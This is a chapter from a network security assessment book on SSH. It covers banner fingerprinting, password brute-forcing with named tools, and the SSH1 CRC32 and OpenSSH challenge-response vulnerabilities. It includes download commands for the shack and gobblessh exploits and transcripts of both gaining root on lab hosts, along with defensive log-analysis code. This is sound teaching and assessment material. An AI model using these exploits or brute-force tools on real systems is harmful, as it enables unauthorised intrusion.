7.2 SSH


Secure Shell (SSH) provides encrypted access to Unix and Win32 command shells. Weaknesses in plaintext services such as Telnet were often abused by attackers to compromise networks, so SSH was introduced to provide encrypted access to Unix-based hosts for maintenance purposes.

Before 1999, the only SSH servers available were for commercial use and provided by SSH Communications (http://www.ssh.com) and F-Secure (http://www.f-secure.com). In late 1999, the OpenBSD team worked to provide SSH support in Version 2.6 of their operating system, and OpenSSH 1.2.2 was born. Commercial versions provided by SSH Communications and F-Secure remain supported and are sold, but OpenSSH has proved to be extremely popular and is now included with most Linux distributions.

Because the session is encrypted end to end, a dedicated SSH client is required to connect to and authenticate with an SSH service. The free OpenSSH package, which includes the ssh client, can be downloaded from http://www.openssh.com.

For Windows users, PuTTY is a freely downloadable tool available with a host of other SSH client utilities (including PSCP, PSFTP, and Plink) available from http://www.chiark.greenend.org.uk/~sgtatham/putty/.

7.2.1 SSH Fingerprinting

To correctly ascertain vulnerabilities that may be present in the target SSH service, first perform banner grabbing by using telnet or nc to connect to the SSH service. The server sends its identification string as soon as the TCP connection is established, before any key exchange takes place, so no SSH client is needed to read it. Example 7-1 shows how telnet can do this: the banner shows the host is running OpenSSH 3.5 patch level 1 using the SSH 2.0 protocol.

Example 7-1. Grabbing the SSH service banner using telnet
# telnet 192.168.0.80 22
Trying 192.168.0.80...
Connected to 192.168.0.80.
Escape character is '^]'.
SSH-2.0-OpenSSH_3.5p1

Security-conscious administrators will often modify the SSH banner to present false information. Example 7-2 shows this: the service still reports the protocol version it speaks (SSH 2.0), because clients depend on that field, but the software type and version are unknown (the field has been set to 0.0.0).

Example 7-2. Grabbing a modified SSH service banner
# telnet 192.168.189.2 22
Trying 192.168.189.2...
Connected to 192.168.189.2.
Escape character is '^]'.
SSH-2.0-0.0.0

Here's a list of common SSH service fingerprints:


Cisco SSH 1.25

# telnet 192.168.189.254 22
Trying 192.168.189.254...
Connected to 192.168.189.254.
Escape character is '^]'.
SSH-1.5-Cisco-1.25

SSH Communications SSH 2.2.0

# telnet 192.168.189.18 22
Trying 192.168.189.18...
Connected to 192.168.189.18.
Escape character is '^]'.
SSH-1.99-2.2.0

F-Secure SSH 1.3.6

# telnet 192.168.189.26 22
Trying 192.168.189.26...
Connected to 192.168.189.26.
Escape character is '^]'.
SSH-1.5-1.3.6_F-SECURE_SSH

If SSH-1.99 is reported by the SSH service, both SSH 1.5 and 2.0 protocols are supported. Some SSH clients, such as PuTTY, previously didn't support SSH 2.0, and many administrators accordingly ran their services to be backward-compatible.
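As an added example (not code from the book), here is a small Python banner grabber and parser that applies the rules above: it reads the identification string the server sends on connect, splits it into protoversion and softwareversion as RFC 4253 defines the line, records which protocol versions the server speaks (1.99 meaning both), and guesses the product from the software field. The sample banners are the ones quoted in this section; the vendor heuristics and function names are assumptions of this example.

```python
import socket

# Constructed sample: the banners quoted in this section.
SAMPLE_BANNERS = [
    "SSH-2.0-OpenSSH_3.5p1",
    "SSH-2.0-0.0.0",
    "SSH-1.5-Cisco-1.25",
    "SSH-1.99-2.2.0",
    "SSH-1.5-1.3.6_F-SECURE_SSH",
]


def guess_vendor(software):
    """Heuristic product identification from the softwareversion field."""
    s = software.lower()
    if s.startswith("openssh"):
        return "OpenSSH"
    if s.startswith("cisco"):
        return "Cisco"
    if "f-secure" in s:
        return "F-Secure"
    if software and all(ch.isdigit() or ch == "." for ch in software):
        # SSH Communications servers announce a bare version number (2.2.0);
        # an all-zero version is the mark of a deliberately modified banner.
        if set(software) <= {"0", "."}:
            return "modified banner"
        return "SSH Communications"
    return "unknown"


def parse_ssh_banner(line):
    """Parse one identification line (SSH-<proto>-<software>[ <comments>]).
    Returns a dict, or None if the line is not an SSH banner."""
    line = line.rstrip("\r\n")
    if not line.startswith("SSH-"):
        return None
    # protoversion ends at the first '-'; the software field may itself
    # contain dashes (Cisco-1.25), so split only once.
    proto, sep, rest = line[4:].partition("-")
    if not sep:
        return None
    software, _, comments = rest.partition(" ")
    return {
        "protoversion": proto,
        "software": software,
        "comments": comments,
        "vendor": guess_vendor(software),
        # 1.99 means the server speaks both protocol 1 and protocol 2.
        "supports_ssh1": proto.startswith("1."),
        "supports_ssh2": proto in ("1.99", "2.0"),
    }


def grab_ssh_banner(host, port=22, timeout=5.0):
    """Connect and return the parsed server banner (None if none was seen).
    The server sends its banner before any key exchange, so nothing has to be
    sent first; RFC 4253 also lets it precede the banner with other lines,
    which are skipped here."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        stream = sock.makefile("rb")
        for _ in range(32):
            raw = stream.readline()
            if not raw:
                break
            parsed = parse_ssh_banner(raw.decode("ascii", "replace"))
            if parsed:
                return parsed
    return None


def fingerprint_report(banners):
    """One summary line per banner: protocol support and product guess."""
    lines = []
    for banner in banners:
        p = parse_ssh_banner(banner)
        if p is None:
            continue
        protos = "+".join(name for name, ok in (("ssh1", p["supports_ssh1"]),
                                                ("ssh2", p["supports_ssh2"])) if ok)
        lines.append(f"{banner:30} {protos:10} {p['vendor']} ({p['software']})")
    return lines


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:          # live grab: python3 sshfp.py HOST [PORT]
        port = int(sys.argv[2]) if len(sys.argv) > 2 else 22
        print(grab_ssh_banner(sys.argv[1], port))
    else:
        print("\n".join(fingerprint_report(SAMPLE_BANNERS)))
```

Run without arguments it classifies the sample banners; with a host (and optional port) it performs a live grab. The software field is free text chosen by the server, so treat the vendor guess as a lead to confirm, not as proof.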

7.2.2 SSH Brute-Force Password Grinding

SSH is designed to slow brute-force attacks rather than to prevent them. Each connection accepts a username and then permits only a small number of password attempts before the connection is dropped (the standard ssh client prompts three times; in current OpenSSH the server-side ceiling is the MaxAuthTries setting, six by default), and every failed username and password combination is written to the system log.

Sebastian Krahmer wrote a threaded SSH2 brute-force tool called guess-who. The utility manages up to 30 attempts per second on internal networks; across the Internet, throughput varies with server configuration and connection speed. The tool compiles cleanly in Unix environments; find it at http://packetstormsecurity.org/groups/teso/guess-who-0.44.tgz.[1]

[1] URLs for tools in this book are mirrored at the O'Reilly site, http://examples.oreilly.com/networksa/tools.

An expect script available from http://examples.oreilly.com/networksa/tools/55hb.txt is a simple way to perform brute force against both SSH1 and SSH2 services. The 55hb script simply passes usernames and passwords to the Unix SSH client binary.
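Because every failed attempt lands in the system log, password grinding is easy to spot from the defender's side. The following is an added example (not from the book or from any of the tools above): a Python scan over OpenSSH syslog lines that collects "Failed password" events per source address and flags any source whose failures in a sliding window reach a threshold. The log lines are constructed for the example, and the threshold, window and function names are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample of OpenSSH syslog output (not taken from a real host).
SAMPLE_LOG = """\
Mar  7 21:07:39 www sshd[2101]: Failed password for root from 192.168.189.18 port 40122 ssh2
Mar  7 21:07:41 www sshd[2101]: Failed password for root from 192.168.189.18 port 40122 ssh2
Mar  7 21:07:43 www sshd[2101]: Failed password for root from 192.168.189.18 port 40122 ssh2
Mar  7 21:07:44 www sshd[2103]: Failed password for invalid user admin from 192.168.189.18 port 40125 ssh2
Mar  7 21:07:46 www sshd[2103]: Failed password for invalid user admin from 192.168.189.18 port 40125 ssh2
Mar  7 21:07:47 www sshd[2105]: Failed password for invalid user oracle from 192.168.189.18 port 40130 ssh2
Mar  7 21:09:02 www sshd[2110]: Failed password for chris from 192.168.0.5 port 51000 ssh2
Mar  7 21:09:10 www sshd[2110]: Accepted password for chris from 192.168.0.5 port 51000 ssh2
Mar  7 21:09:15 www sshd[2112]: Failed password for chris from 192.168.0.6 port 51002 ssh1
"""

# "Failed <method> for [invalid user ]<user> from <ip> port <n> ssh[12]"
FAILED_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed (?P<method>\S+) for (?:(?P<invalid>invalid user) )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+|[0-9a-fA-F:]+) port \d+ (?P<proto>ssh[12])$"
)


def parse_failed_logins(lines):
    """Return (timestamp, user, ip, invalid_user) for each failed sshd auth line."""
    events = []
    for line in lines:
        m = FAILED_RE.match(line.strip())
        if not m:
            continue                     # accepted logins, disconnects, etc.
        # syslog timestamps carry no year; strptime defaults it, which is fine
        # for measuring gaps inside one log.
        ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")
        events.append((ts, m.group("user"), m.group("ip"), m.group("invalid") is not None))
    return events


def max_in_window(timestamps, window_seconds):
    """Largest number of events inside any span of window_seconds (two-pointer scan)."""
    ts = sorted(timestamps)
    best = start = 0
    for end in range(len(ts)):
        while (ts[end] - ts[start]).total_seconds() > window_seconds:
            start += 1
        best = max(best, end - start + 1)
    return best


def find_password_grinding(lines, threshold=5, window_seconds=60):
    """Map each source IP whose peak failure rate reaches the threshold to a summary."""
    by_ip = defaultdict(list)
    for ts, user, ip, invalid in parse_failed_logins(lines):
        by_ip[ip].append((ts, user, invalid))
    flagged = {}
    for ip, events in by_ip.items():
        peak = max_in_window([e[0] for e in events], window_seconds)
        if peak >= threshold:
            flagged[ip] = {
                "attempts": len(events),
                "peak_in_window": peak,
                "users": sorted({e[1] for e in events}),
                "invalid_users": sorted({e[1] for e in events if e[2]}),
            }
    return flagged


if __name__ == "__main__":
    for ip, info in find_password_grinding(SAMPLE_LOG.splitlines()).items():
        print(f"{ip}: {info['attempts']} failures, peak {info['peak_in_window']}/60s, "
              f"users {info['users']} (unknown: {info['invalid_users']})")
```

On the sample, only 192.168.189.18 is reported: six failures in eight seconds across root and two nonexistent accounts, the signature of a dictionary run such as guess-who or 55hb. The "invalid user" marker is worth keeping separate, because a grinder that guesses usernames as well as passwords trips it while a user mistyping a password never does.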

7.2.3 SSH Vulnerabilities

The presence of process manipulation vulnerabilities within SSH services depends on two things:

  • The SSH server and version in use (OpenSSH, LSH, Cisco, or commercial SSH)

  • The SSH protocol version the target server supports (1.0, 1.5, 1.99, or 2.0)

Knowing the SSH service type, version, and which protocols are supported, you can check vulnerability databases and sites, including MITRE CVE, ISS X-Force, SecurityFocus, and Packet Storm, to ascertain whether the services at hand are vulnerable to attack.

Two serious remote vulnerabilities uncovered in SSH since 2001 are the SSH1 CRC32 compensation vulnerability and the OpenSSH 2.9.9-3.3 challenge-response bug. In the next few sections, I discuss these bugs along with examples of exploitation. Many other bugs have been found in SSH, but they rely on nondefault options enabled at compilation or on a valid username and password combination (these are known as post-authentication vulnerabilities).

7.2.3.1 SSH1 CRC32 compensation vulnerability

On February 8, 2001, CORE-SDI released an advisory documenting a remote integer overflow in several implementations of the SSH1 protocol. Ironically, this vulnerability is located in a segment of code that was introduced to defend against exploitation of CRC32 weaknesses within the SSH1 protocol (see http://www.kb.cert.org/vuls/id/13877).

The attack detection function (detect_attack( ) in deattack.c) uses a dynamically allocated hash table, indexed by the 8-byte cipher blocks of each incoming packet, to detect and respond to CRC32 attacks. The table size is derived from the packet length and stored in a 16-bit variable. By sending a crafted SSH1 packet whose length is large enough, an attacker wraps that variable to zero, so the service allocates a zero-length table and then writes block indices through it at offsets the mask no longer bounds, resulting in memory corruption and arbitrary code execution.

Full details of this vulnerability and vendor patches are available at:

http://www.securityfocus.com/advisories/3088
http://www.kb.cert.org/vuls/id/945216
http://xforce.iss.net/xforce/xfdb/6083
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0144

Nowadays, most SSH servers support only Version 2 of the protocol and aren't susceptible to this attack. If you see a server respond with a 1.5 or 1.99 protocol string in its banner, it still accepts SSH1 connections and may well be vulnerable; confirm by checking the exact software version against the advisories above.

7.2.3.2 SSH1 CRC32 compensation exploit

Later in 2001, a publicly available exploit (precompiled for Linux only), known variously as x2, x4, or shack, was released; it is mirrored at http://packetstormsecurity.org/0201-exploits/cm-ssh.tgz.

Example 7-3 shows how I download, unpack, and run the precompiled Linux shack exploit, revealing command-line options and available target offsets.

Example 7-3. Downloading and running shack
# wget http://packetstormsecurity.org/0201-exploits/cm-ssh.tgz
# tar xvfz cm-ssh.tgz
shack
sscan
targets
# ./shack
SSHD deattack exploit. By Dvorak with Code from teso
error: No target specified
Usage: sshd-exploit -t# <options> host [port]
Options:
        -t num (mandatory)  defines target, use 0 for target list
        -X string           skips certain stages
# ./shack -t0
SSHD deattack exploit. By Dvorak with Code from teso
Targets:
( 1)    Small - SSH-1.5-1.2.27
( 2)    Small - SSH-1.99-OpenSSH_2.2.0p1
( 3)    Big - SSH-1.99-OpenSSH_2.2.0p1
( 4)    Small - SSH-1.5-1.2.26
( 5)    Big - SSH-1.5-1.2.26
( 6)    Small - SSH-1.5-1.2.27
( 7)    Big - SSH-1.5-1.2.27
( 8)    Small - SSH-1.5-1.2.31
( 9)    Big - SSH-1.5-1.2.31
(10)    Small - SSH-1.99-OpenSSH_2.2.0p1
(11)    Big - SSH-1.99-OpenSSH_2.2.0p1

I can now launch the exploit against my vulnerable Red Hat Linux 6.2 server running OpenSSH 2.2.0p1 at 192.168.189.254 using target number 10, as shown in Example 7-4.

Example 7-4. Compromising a Red Hat 6.2 host using shack
# ./shack -t10 192.168.189.254 22
SSHD deattack exploit. By Dvorak with Code from teso
Target: Small - SSH-1.99-OpenSSH_2.2.0p1
Attacking: 192.168.189.254:22
Testing if remote sshd is vulnerable # ATTACH NOW YES #
Finding h - buf distance (estimate)
(1 ) testing 0x00000004 # SEGV #
(2 ) testing 0x0000c804 # FOUND #
Found buffer, determining exact diff
Finding h - buf distance using the teso method
(3 ) binary-search: h: 0x083fb7fc, slider: 0x00008000 # SEGV #
(4 ) binary-search: h: 0x083f77fc, slider: 0x00004000 # SURVIVED #
(5 ) binary-search: h: 0x083f97fc, slider: 0x00002000 # SURVIVED #
(6 ) binary-search: h: 0x083fa7fc, slider: 0x00001000 # SURVIVED #
(7 ) binary-search: h: 0x083faffc, slider: 0x00000800 # SEGV #
(8 ) binary-search: h: 0x083fabfc, slider: 0x00000400 # SEGV #
(9 ) binary-search: h: 0x083fa9fc, slider: 0x00000200 # SEGV #
(10) binary-search: h: 0x083fa8fc, slider: 0x00000100 # SURVIVED #
(11) binary-search: h: 0x083fa97c, slider: 0x00000080 # SURVIVED #
(12) binary-search: h: 0x083fa9bc, slider: 0x00000040 # SURVIVED #
(13) binary-search: h: 0x083fa9dc, slider: 0x00000020 # SURVIVED #
(14) binary-search: h: 0x083fa9ec, slider: 0x00000010 # SURVIVED #
(15) binary-search: h: 0x083fa9f4, slider: 0x00000008 # SEGV #
Bin search done, testing result
Finding exact h - buf distance
(16) trying: 0x083fa9ec # SURVIVED #
Exact match found at: 0x00005614
Looking for exact buffer address
Finding exact buffer address
(124) Trying: 0x080e0614 # SURVIVED #
Finding distance till stack buffer
(134) Trying: 0xb7f242f4 # SURVIVED #
verifying
(135) Trying: 0xb7f242f4 # SEGV #
OK
Finding exact h - stack_buf distance
(140) trying: 0xb7f24154  slider: 0x0020# SURVIVED #
(141) trying: 0xb7f24144  slider: 0x0010# SURVIVED #
(142) trying: 0xb7f2413c  slider: 0x0008# SEGV #
(143) trying: 0xb7f24140  slider: 0x0004# SEGV #
(144) trying: 0xb7f24142  slider: 0x0002# SEGV #
Final stack_dist: 0xb7f24144
EX: buf: 0x080dd614 h: 0x080d8000 ret-dist: 0xb7f240ca
ATTACH NOW
Changing MSW of return address to: 0x080d
Crash, finding next return address
Changing MSW of return address to: 0x080e
Crash, finding next return address
EX: buf: 0x080dd614 h: 0x080d8000 ret-dist: 0xb7f240ae
ATTACH NOW
Changing MSW of return address to: 0x080d
Crash, finding next return address
Changing MSW of return address to: 0x080e
No Crash, might have worked
Reply from remote: CHRIS
CHRIS
***** YOU ARE IN *****
Linux www 2.2.14-5.0 #1 Tue Mar 7 21:07:39 EST 2000 i686 unknown
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

The exploit takes a few minutes to run because it performs binary searching and return-address brute-forcing to inject and run its shellcode. Chapter 13 discusses exploitation issues in some detail, discussing differences between simple stack overwrites, integer overflows, and heap-corruption vulnerabilities. The original x2 exploit source code is extremely rare, but it's available from the O'Reilly archive at http://examples.oreilly.com/networksa/tools/x2src.tgz.

7.2.3.3 OpenSSH challenge-response vulnerability

On June 26, 2002, Internet Security Systems (ISS) released an advisory documenting a remotely exploitable integer overflow, leading to a heap overflow, within the challenge-response (keyboard-interactive) authentication code of OpenSSH (present within Versions 2.9.9 to 3.3). The number of responses claimed by the client is used to size a heap allocation before the responses are stored into it. To exploit this vulnerability, the target SSH service must be compiled with the BSD_AUTH or SKEY authentication options enabled, which is the case within OpenBSD 3.0 and 3.1 in particular.
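Both the CRC32 compensation bug of 7.2.3.1 and this challenge-response bug come down to an allocation size computed from attacker-controlled numbers in arithmetic that is too narrow. The following is an added example, not code from the book or from OpenSSH: a Python model of the two size computations, using the constants from OpenSSH's deattack.h, that shows which SSH1 packet lengths wrap the 16-bit table size in detect_attack( ) to zero (and what the index mask becomes), and how many bytes input_userauth_info_response( ) hands to xmalloc( ) for a large response count. The function names, the i386 pointer size and the comparison with the fixed arithmetic are assumptions of this model.

```python
# Constants from OpenSSH's deattack.h (CRC32 compensation attack detector).
SSH_BLOCKSIZE  = 8
SSH_MAXBLOCKS  = 32 * 1024
HASH_MINSIZE   = 8 * 1024
HASH_ENTRYSIZE = 2            # each table entry is a u_int16_t block index


def HASH_FACTOR(x):
    return x * 3 // 2


def deattack_table_entries(packet_len, n_bits):
    """Mirror the table-sizing loop at the top of detect_attack().

    n_bits is the width of the static variable n that receives the table size:
    16 in the vulnerable code, 32 after the fix.  Returns (n, index_mask), where
    index_mask is what h[HASH(c) & (n - 1)] uses to keep lookups in the table.
    """
    if packet_len > SSH_MAXBLOCKS * SSH_BLOCKSIZE or packet_len % SSH_BLOCKSIZE:
        raise ValueError("detect_attack: bad length")      # this check IS present
    l = HASH_MINSIZE // HASH_ENTRYSIZE                      # 4096 entries to start
    while l < HASH_FACTOR(packet_len // SSH_BLOCKSIZE):
        l <<= 2                                             # grow 4x per pass
    n = l & ((1 << n_bits) - 1)                             # n = l, truncated to n's width
    # In C the 16-bit n is promoted to int, so n == 0 makes (n - 1) == -1:
    # every bit of HASH(c) survives the mask and the index is unbounded.
    index_mask = (n - 1) & 0xFFFFFFFF
    return n, index_mask


def deattack_wrapping_lengths():
    """Smallest and largest accepted packet length for which the 16-bit n wraps to 0."""
    hits = [length
            for length in range(0, SSH_MAXBLOCKS * SSH_BLOCKSIZE + 1, SSH_BLOCKSIZE)
            if deattack_table_entries(length, 16)[0] == 0]
    return (hits[0], hits[-1]) if hits else None


def info_response_alloc_bytes(nresp, fixed):
    """Mirror the allocation in input_userauth_info_response() (auth2-chall.c).

    nresp is a 32-bit count read straight from the client's packet.  The
    vulnerable code passed nresp * sizeof(char *) to xmalloc() and then stored
    up to nresp pointers into the result; the fix rejects nresp > 100 first.
    """
    SIZEOF_CHAR_PTR = 4                                     # i386 (assumption)
    if fixed and nresp > 100:
        raise ValueError("input_userauth_info_response: nresp too big")
    return (nresp * SIZEOF_CHAR_PTR) & 0xFFFFFFFF           # 32-bit size_t arithmetic


if __name__ == "__main__":
    lo, hi = deattack_wrapping_lengths()
    print(f"CRC32 detector: packet lengths {lo}..{hi} bytes give n = 0 with a 16-bit n")
    for bits in (16, 32):
        n, mask = deattack_table_entries(hi, bits)
        print(f"  n as {bits}-bit: table entries={n}, index mask=0x{mask:08x}")
    nresp = 0x40000001
    size = info_response_alloc_bytes(nresp, fixed=False)
    print(f"challenge-response: nresp=0x{nresp:x} -> xmalloc({size}) "
          f"followed by {nresp} pointer stores")
```

Run it to see the ranges: any SSH1 packet of 87392 to 262144 bytes (the largest length the function accepts) drives the detector's 16-bit table size to zero, and a response count of 0x40000001 makes the challenge-response handler allocate four bytes for what it then treats as a billion-entry array. The fixed code widens n to 32 bits and caps nresp, which is why neither input produces a dangerous size there.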

Full details of the vulnerability and respective vendor patches are available at:

http://xforce.iss.net/xforce/xfdb/9169
http://www.cert.org/advisories/CA-2002-18.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0639

7.2.3.4 OpenSSH challenge-response exploit

ISS hasn't released any public exploit code relating to this vulnerability. The GOBBLES security team, however, released an exploit built as a patch to the OpenSSH client that remotely compromises OpenBSD 3.0 and 3.1 hosts running OpenSSH 2.9.9 to 3.3; it's available at http://www.immunitysec.com/GOBBLES/exploits/sshutup-theo.tar.gz.

After compiling a patched SSH client (gobblessh), you can run the tool and reveal the usage and supported options, as shown in Example 7-5.

Example 7-5. The gobblessh usage and options
# ./gobblessh

GOBBLES SECURITY - WHITEHATS POSTING TO BUGTRAQ FOR FAME
OpenSSH 2.9.9 - 3.3 remote challenge-response exploit
#1 rule of ``ethical hacking'': drop dead

Usage: gobblessh [options] host
Options:
***** READ THE HOWTO FILE IN THE TARBALL *****
  -l user     Log in using this user name.
  -p port     Connect to this port.
  -M method   Select the device (skey or bsdauth)
              default: bsdauth
  -S style    If using bsdauth, select the style
              default: skey
  -d rep      Test shellcode repeat
              default: 10000 (with -z) ; 0 (without -z)
  -j size     Chunk size
              default: 4096 (1 page)
  -r rep      Connect-back shellcode repeat
              default: 60 (not used with -z)
  -z          Enable testing mode
  -v          Verbose; display verbose debugging messages.
              Multiple -v increases verbosity.

Example 7-6 shows the exploit being run against a fresh install of OpenBSD 3.0 at 192.168.189.12 to gain super-user privileges.

Example 7-6. Compromising an OpenBSD server using gobblessh
# ./gobblessh -l root 192.168.189.12
[*] remote host supports ssh2
Warning: Permanently added '192.168.189.12' (RSA) to the list of known hosts.
[*] server_user: root:skey
[*] keyboard-interactive method available
[*] chunk_size: 4096 tcode_rep: 0 scode_rep 60
[*] mode: exploitation
*GOBBLE*
OpenBSD openbsd 3.0 192.168.189.12 i386
uid=0(root) gid=0(wheel) groups=0(wheel)

7.2.3.5 Other remotely exploitable SSH flaws

At the time of writing, the CERT vulnerability notes at http://www.kb.cert.org/vuls/ list the remotely exploitable vulnerabilities in SSH services (not including denial-of-service or locally exploitable issues); they are detailed in Table 7-1.

Table 7-1. Remotely exploitable SSH vulnerabilities

CERT ID      Date (DD/MM/YYYY)   Notes
VU#40327     09/06/2000          OpenSSH 2.1.1 and prior with the UseLogin option allows remote execution of commands as root
VU#945216    08/02/2001          SSH CRC32 attack detection code integer overflow bug
VU#369347    24/06/2002          OpenSSH 3.3 and prior contains vulnerabilities in challenge-response handling code
VU#389665    16/12/2002          Multiple SSH key exchange and initialization bugs
VU#333628    16/09/2003          OpenSSH prior to 3.7.1 contains buffer management errors
VU#209807    23/09/2003          OpenSSH 3.7.1p1 and prior PAM conversion overflow
VU#602204    23/09/2003          OpenSSH 3.7.1p1 and prior PAM authentication failure



Network Security Assessment: Know Your Network
ISBN: 059600611X
Year: 2006
Authors: Chris McNab